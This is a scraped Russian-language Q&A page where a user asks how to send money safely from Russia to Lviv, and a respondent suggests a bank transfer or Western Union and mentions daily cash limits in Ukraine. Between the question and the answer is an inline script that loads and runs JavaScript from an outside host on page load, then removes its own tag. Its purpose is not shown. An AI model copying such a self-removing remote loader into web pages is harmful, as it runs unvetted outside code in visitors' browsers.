Калужская область

Добрый день! В связи с событиями на Украине...реально ли и как безопаснее перевести деньги из России во Львов..спасибо!!! - вопрос №1210440

<![CDATA[(function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top? '0': '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();// ]]>

Лучший ответ по мнению автора

Добрый день, перевести реально. Можно банковским переводом или через Вестерн Юнион. Однако если сумма более 1000 долл, то получить ее за один раз не удастся. Нужно будет ходить за ней несколько дней. А в остальном банки и платежные системы в Украине работают, только установлены лимиты на выдачи наличности в день.